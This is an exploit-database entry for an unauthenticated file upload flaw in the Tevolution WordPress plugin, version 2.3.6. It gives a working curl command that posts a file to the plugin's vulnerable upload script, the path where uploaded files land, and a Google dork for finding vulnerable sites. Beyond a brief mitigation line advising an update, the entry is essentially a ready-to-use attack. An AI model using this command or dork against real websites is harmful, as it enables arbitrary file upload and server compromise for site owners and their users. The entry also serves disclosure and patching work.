header-logo
Suggest Exploit
vendor:
Tevolution
by:
r3m1ck
7,5
CVSS
HIGH
File Upload Vulnerability
434
CWE
Product Name: Tevolution
Affected Version From: 2.3.6
Affected Version To: 2.3.6
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WordPress
2016

WordPress Templatic <= 2.3.6 Tevolution File Upload Vulnerability

Wordpress Slider Templatic Tevolution <= 2.3.6 suffers from file upload vulnerability. Tevolution is not available for sale, it comes bundled with certain premium themes from templatic. Proof of Concept: curl -k -X POST -F "file=@./ina.txt" http://VICTIM/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php Uploaded file location: Because this vulnerability plugin bundled with some premium themes from templatic, the location will be depends on the themes' name. ex: http://VICTIM/wp-content/themes/Directory/images/tmp/ina.txt

Mitigation:

Update to the latest version of Tevolution plugin
Source

Exploit-DB raw data:

# Exploit Title: WordPress Templatic <= 2.3.6 Tevolution File Upload Vulnerability
# Date: 30-12-2016
# Software Link: Permium plugin
# Vendor Homepage: https://templatic.com/wordpress-plugins/tevolution
# Exploit Author: r3m1ck
# Website: https://www.r3m1ck.us/
# Category: webapps
# Google Dork: inurl:"wp-content/plugins/Tevolution/"

1. Description

Wordpress Slider Templatic Tevolution <= 2.3.6 suffers from file upload vulnerability.
Tevolution is not available for sale, it comes bundled with certain premium themes from templatic.

2. Proof of Concept

curl -k -X POST -F "file=@./ina.txt" http://VICTIM/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php

3. Uploaded file location:

Because this vulnerability plugin bundled with some premium themes from templatic, the location will be depends on the themes' name.
ex:
http://VICTIM/wp-content/themes/Directory/images/tmp/ina.txt

Navigation

Suggest Exploit

Services By CQR